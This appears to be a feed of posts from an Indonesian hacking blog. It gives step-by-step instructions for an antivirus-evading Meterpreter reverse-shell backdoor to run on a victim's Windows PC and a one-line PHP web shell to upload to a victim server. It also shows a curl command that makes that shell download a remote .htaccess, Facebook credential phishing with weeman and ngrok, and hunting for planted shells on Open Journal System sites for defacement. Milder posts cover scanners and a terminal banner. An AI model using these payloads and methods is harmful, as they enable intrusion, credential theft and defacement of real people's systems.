News Ticker

Latest Posts

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)

- Saturday, April 14, 2018 No Comments

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)


Jika sebelumnya saya bahas hack windows  dengan msfvenom biasa (tanpa bantuan apapun, tapi kali ini saya akan share tutorial bagaimana Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD).

Baca Juga :
Cara Membuat Backdoor Fud Menggunakan Veil-Evasion
Hack Windows Beda Jaringan Menggunakan Metasploit 

Oke langsung saja ke tutorial utamanya, cekidot.....

Download terlebih dahulu zirikatunya di github, bisa clone, bisa juga didownload langsung (dalam format zip) di link berikut
https://github.com/pasahitz/zirikatu

Jika sudah didownload, silahkan ekstrak file zirikatunya tadi, lalu buka folder yg sudah diekstrak menggunakan terminal, seperti berikut.....


Lalu jalankan tool Zirikatunya :


Disana terdapat beberapa pilihan, bisa kalian coba-coba sendiri, disini saya memilih pilihan yang nomor 3, yaitu Meterpreter_Reverse_https

Selanjutnya :
Set LHOST-nya, karena disini hanya jangkauan lokal, kita gunakan ip lokal kita, bisa dilihat dengan menggunakan perintah
ifconfig

Lalu set LPORT kita, kalian bisa set bebas berapapun angkanya, (karna lokal).
Untuk langkah  selanjutnya, bisa menyesuaikan....


Nah disana ada pertanyaan blablabla, kita yes kan saja, agar langsung masuk ke msfconsole dan si Zirikatunya sendiri sudah men-set sesuai dengan payload yang sudah kita buat, kita hanya tinggal menjalankan backdoornya di OS korban :D

Ok kita jalankan backdoornya..

(Sebelum Backdoor dieksekusi)

(Sesudah Dieksekusi).

Untuk lebih jelasnya, bisa disimak langsung lewat video berikut :

link =====> https://www.youtube.com/watch?v=i8cInI46fRQ



Ok sekian saja tutor saya :D ,
ouh iyha, untuk yang beda jaringan-nya akan menyusul, masih banyak tugas kuliah xixixixi.

Akses Shell, Bukan Download!

- Friday, March 30, 2018 3 Comments

Akses Shell, Bukan Download! - Shell Backdoor dalam computer security system ,merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Salah satu cara mananamkan shell backdoor pada server adalah dengan metode  JQuery File Upload, tapi pernahkah kalian melakukan cara ini namun saat meng-akses shell, shell backdoor kalian malah ter-download? Oke, kita bahas solusinya.


  • .htaccess
Salah satu penyebab shell malah ter-download adalah htaccess. Apa itu htaccess? .htaccess adalah file untuk merubah beberapa konfigurasi untuk mengarahkan pada web server Apache.

AddType application/octet-stream .php

Lalu bagaimana solusinya? Solusinya adalah me-replace htaccess server dengan htaccess kita sendiri.

Bagaimana caranya??

  • 1. Siapkan file .php berisi script berikut,
<?php passthru($_POST['cmd']); __halt_compiler(); ?>
  • 2. Upload ke server korban.
  • 3. Buka termninal, ketikkan perintah,
curl -d cmd="wget https://pastebin.com/raw/jPx1hG0Q -O .htaccess" urlshell
contoh:
curl -d cmd="wget https://pastebin.com/raw/jPx1hG0Q -O .htaccess" http://maxteroit.com/shell.php


  • 4. Upload shell dengan format .berandal > contoh: shell.berandal
Contoh hasil upload:  
https://www.hicinko.com/cruisecms/public/uploadcontent/server/php/files//kecil.berandal

Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.

Terima Kasih,
Berandal. 

Berkenalan Dengan Metasploit Web Crawler

- Sunday, March 11, 2018 No Comments

Berkenalan Dengan Metasploit Web Crawler. - Apa itu Metasploit? Metasploit framework adalah sebuah penetration tool yang cukup powerfull untuk melakukan penestrasi kedalam sebuah system. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1.

Baca Juga: Apa Itu Metasploit Dan Pengertian Beserta Fungsinya.

Auxiliary Module, Modul ini adalah perayap web modular, untuk digunakan bersamaan dengan wmap (suatu hari nanti) atau mandiri.

Module Options, Untuk menampilkan pilihan yang tersedia, muat modul di dalam konsol Metasploit dan jalankan perintah 'show options' atau 'show advanced'.

msf > use auxiliary/crawler/msfcrawler
msf auxiliary(msfcrawler) > show actions
...actions...
msf auxiliary(msfcrawler) > set ACTION
msf auxiliary(msfcrawler) > show options
...show and set options...
msf auxiliary(msfcrawler) > run

Cara Crawling Web Menggunakan Metasploit Web Crawler,
use auxiliary/crawler/msfcrawler
msf auxiliary(msfcrawler) > set rhosts www.example.com
msf auxiliary(msfcrawler) > exploit

Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Sekian pembahasan tentang Metasploit Web Crawler, jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.

Terima Kasih,
Berandal.

XSSSNIPER

- Wednesday, January 31, 2018 1 Comment

XSSSNIPER is an handy xss discovery tool with mass scanning functionalities.

Usage:
Usage: xsssniper.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     target URL
  --post                try a post request to target url
  --data=POST_DATA      post data to use
  --threads=THREADS     number of threads
  --http-proxy=HTTP_PROXY
                        scan behind given proxy (format: 127.0.0.1:80)
  --tor                 scan behind default Tor
  --crawl               crawl target url for other links to test
  --forms               crawl target url looking for forms to test
  --user-agent=USER_AGENT
                        provide an user agent
  --random-agent        perform scan with random user agents
  --cookie=COOKIE       use a cookie to perform scans
  --dom                 basic heuristic to detect dom xss

Examples:
Scanning a single url with GET params:
$ python xsssniper.py -u "http://target.com/index.php?page=test"
Scanning a single url with POST params:
$ python xsssniper.py -u "http://target.com/index.php" --post --data=POST_DATA
Crawl a single url looking for forms to scan:
$ python xsssniper.py -u "http://target.com" --forms
Mass scan an entire website:
$ python xsssniper.py -u "http://target.com" --crawl
Mass scan an entire website forms included:
$ python xsssniper.py -u "http://target.com" --crawl --forms
Analyze target page javascripts (embedded and linked) to search for common sinks and sources:
$ python xsssniper.py -u "http://target.com" --dom


Cara Install WPSeku Di Termux

- Sunday, January 21, 2018 No Comments

Artikel ini saya repost dari Termux Tutorial . Buat kalian yang demen heking heking website tapi gapunya pc/laptop, kali ini dilakukan pada perangkat android . Melalui Aplikasi yg bernama termux . kalian bisa cari di playstore . lalu termux itu apa dan kegunaannya . Saya ambil sedikit kutipan dari official termux "Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager"
Ngerti gak? gw gak ngerti anjir. translate aja dah sana wkwkwk .
Pada artikel ini saya akan menjelaskan tentang alat wpseku dan juga saya akan menunjukkan cara menginstal alat wpseku di termux menggunakan android. Alat ini juga bekerja pada perangkat aarch tapi wpscan tidak bekerja pada perangkat aarch.
WPSeku adalah pemindai kerentanan BlackBox WordPress yang bisa digunakan untuk memindai instalasi WordPress jarak jauh untuk menemukan masalah keamanan.
Install WPSeku Di Termux:
Pertama Anda Harus melakukan update dengan command berikut :
$ apt update && apt upgrade -y 
$ apt install git

Lalu ketik :
$ cd WpSeku
$ pkg install python2
$ pip2 install -r requirements.txt
$ python2 wpseku.py -t site.com

Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet

- Saturday, January 13, 2018 No Comments

Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet. Banyak sekali cara mengganti tampilan header terminal di Mac OS X. Misalnya, kita bisa menggunakan Figlet atau Cowsay atau yang lainnya. Kali ini kita bahas Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet.

Baca Juga: Kumpulan Video Pembelajaran Pentesting Menggunakan Kali Linux

Figlet adalah sebuah program komputer yang menghasilkan teks spanduk, dalam berbagai tipografi, terdiri dari huruf-huruf terbuat dari kecil konglomerasi ASCII karakter (lihat ASCII art).Diantar kalian mungkin bosen dengan tampilan terminal yang hanya sebuah tempat hitam kosong.

Cara paling cepat untuk meng-install Figlet adalah menggunakan HomeBrew. Kalian bisa meng-install homebrew dengan perintah:

 ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)”

Setelah itu kalian install figlet, dengan mengetik perintah:

brew install figlet

Ketika Figlet sudah ter-install, kalian bisa melihat semua font yang tersedia di sana dengan mengetik perintah:

showfigfonts

Ketika kalian udah selesai memilih font, ketik kata yang kalian inginkan, disini saya contoh kan:

showfigfonts "Maxteroit"

Setelah itu, copy text ASCII yang kalian inginkan. Nah, untuk mengganti tampilan header terminal kalian, ketikkan perintah:

sudo pico /etc/motd

Paste text ASCII yang kalian copy tadi. Lalu tekan Control+O (Overwrite) untuk menyimpan. Lalu Control+X untuk keluar.

Buka terminal baru dan header kalian sudah berubah!

Kumpulan Video Pembelajaran Pentesting Menggunakan Kali Linux

- Wednesday, January 10, 2018 2 Comments

Kumpulan Video Pembelajaran Pentesting Menggunakan Kali Linux


Pentest Menggunakan Kali Linux

Hello, sudah lama tidak update yang berbau hacking, dan kali ini saya babang Maxter akan share
kumpulan video pembelajaran mengenai pentesting menggunakan KALI LINUX  ( OS heker jaman now) dan tools2 yg ada di Kali Linux itu sendiri.

Video pembelajaran ini berbahasa Inggris dan ukurannya pun lumayan besar, sekitar 691 MB-an,didalamnya ada 0-11 part, full video semua, dan pastinya dari orang yg hebat juga. 
Langsung saja.....

Berikut Screenshotnya






Yha itulah sedikit gambar pemanis yg ada di dalam File yg saya share ini.
Dan berikut Linknya : 


Sekian Postingan dari saya, jika ingin request video atau pdf lain atau mungkin request agar file diatas dibagi satu persatu agar sizenya terbagi bisa hubungi saya via email :

adittya@maxteroit.com

 Terima Kasih

Instagram Private Tools Di termux

- Tuesday, January 9, 2018 No Comments

Instagram Private Tools

Personal Tools to manage Instagram account (nodejs)
How to install
$ apt update && apt upgrade -y
$ apt install nodejs git
$ cd Instagram-Private-Tools
$ node index.js
$ git clone https://github.com/ccocot/Instagram-Private-Tools.git
$ npm install
List Tools :
  1. Unfollow not Followback
  2. Unfollow all Following
  3. Delete all media
  4. Follow Followers Target
  5. Bom Like Media Target
  6. Follow Account By Hastag
Thanks To CCOCOT For Making this tools
TERMUX TUTORIAL

Cara Hack Facebook Dengan Weeman dan Ngrok di TERMUX

- Tuesday, December 19, 2017 15 Comments

Cara Hack Facebook Dengan Weeman dan Ngrok

Banyak sekali cara hack facebook dari tahun ke tahun .
Dari mulai methode Bruteforce hingga phising . 
Keberhasilan hack facebook dengan cara membobol password
menggunakan Bruteforce sangat lah kecil . Ya semua tergantung
dari wordlist mu. Cara yang paling efektif ialah menggunakan 
tekhnik phising . Kita hanya perlu membuat sebuah url login page
yg telah di modifikasi de beri log . Tapi itu membutuhkan hosting
dan domain . Kali ini saya akan memberi cara membuat phising
dengan lebih mudah . Mudah bahan maksudnya wkwkw . walaupun
agak sedikit ribet pada prosesnya .
Langsung saja ikuti tahapnya .

Clone Tools weeman dengan command:
$ git clone https://github.com/evait-security/weeman.git
$ cd weeman
$ python2 weeman.py

Nah sekarang atur tools pada weeman . ikuti command berikut:
weeman > set url http://m.facebook.com
weeman > set action_url http://m.facebook.com/login.php

Jika target anda menggunakan desktop . ubah url menjadi http://facebook.com
dan action_url http://facebook.com/login.php

Semua sudah di set langsung jalankan dengan command:
weeman > run


Selanjutnya kita install ngrok dulu, daftar pada https://ngrok.com atau bisa juga
login menggunakan akun google dan github . 

Pilih download


Pilih Linux(ARM)



Buka session baru lalu masuk pada folder penyimpanan hasil download tadi dan ekstrak file zip ngrok :
$ cd storage/shared/Download
$ unzip ngrok-stable-linux-arm.zip
$ mv -v ngrok $HOME
$ cd
$ chmod +x ngrok
*NOTE : Nama partisi sdcard berbeda tiap jenis phonsel . jadi sesuaikan saja
kebanyakan bernama ~/sdcard . Jika kalian belum setting storage . setting dengan command :
$ termux-setup-storage
dan berikan ijin untuk mengakses sdcard


Lalu kita buka kembali website ngrok . dan copy authtoken nya dan paste:


$ ./ngrok authtoken TOKENMU

Lanjut :
$ ./ngrok http 8080

Akan muncul seperti ini : 

Copy forwardingnya :

Sebarkan atau pancing menggunakan tipu muslihat mu . kalo bahasa kerennya Social Engineering wkwkwkw .
Mari kita test, apakah ini berjala  atau tidak .
Pastekan url forwarder dari ngrok tadi 
Coba test login oleh mu . 

Nah mulai lah cari email/username dan passwordnya 


Ketemu kan XD . sekian tutorial Cara Hack Facebook Dengan Weeman Dan Ngrok di Termux . Gunakanlah dengan bijak

Cara Mencari Akses Shell Di CMS Open Journal System

- Tuesday, November 21, 2017 No Comments

    Cara Mencari Akses Shell Di CMS Open Journal System

        Mungkin banyak yg coba deface methode Open Journal System ini karna caranya lumayan cukup gampang , tapi banyak orang yg bermasalah pada saat mencari akses Sell / Script yg telah di upload.ya kali ini gw akan bahas tentang Cara Mencari Akses Shell Di CMS Open Journal System.

Yg pasti kalian udah tau atau mengerti cara deface Open Journa System bagi yg belum coba baca atau tanya ke mbah google , langsung aja ikutin step by step nya.

1.Setelah kalian pilih-pilih target , kalian jangan langsung register + tanam shell , Kalian periksa dahulu apakah direktori tempat shell kalian nanti ada atau kagak..

2.Cara cek nya simple, cukup tambahkan /files di belakang url target kalian contoh : http://target.co.li/files



                                                  (NOT VULN / TIDAK BISA DI TUSBOLD :V)
Kalau sering dapet yg kagak vuln mungkin itu evek ketampanan (faktor face) cuba ganti muka atau download yg baru...mungkin dg otak vokepers mu itu bisa mencari cara untuk mencari akses file nya.



                                                              (BISA VULN BISA TIDAK)

     Nah kalau yg kayak gini bisa vuln , bisa tidak .



                                                      (ITS VULN /DI TUSBOLD ENAK :V)


Yg kayak gini vuln , jngan lupa pastikan ada direktori Journalsnya biar di langkah selanjutnya gk bingung :v ok kita lanjutkan coly nya....

3.kalo udah vuln kayak gambar yg no 3 (kurang lebih , karna terkdang ada tampilan yg berbeda)

4.Setelah tanam shell berhasill, kalian balik lagi ke direktori files, kaya contoh di atas (gambar no.3), lalu kalian klik direktori journals -> (keluar angka-angka) pas di bagian di situ mungkin ada direktori angka yang lebih dari 1 -> ke direktori articles -> direktori id user kalian (angka, baca di tutrial deface ojs) -> lanjut ke direktori submission -> lanjut lagi ke direktori original -> nama file kalian.


Udah paham cok??kalau belum makanya jangan kebanyakan nonton vidio anu .....
sekian dulu totor gk guna kali ini , kalau masih bingung atau yg belum mengerti tutorial di atas bisa tanya-tanya ke SINI (awas orang ganteng  hati2 naksir) atau bisa juga ke SONO.

Spesial thanks to :"Kurniawan PS , Rival " "Garuda Security Hacker And Hacker Patah Hati Team .

Sekian salam jomblo.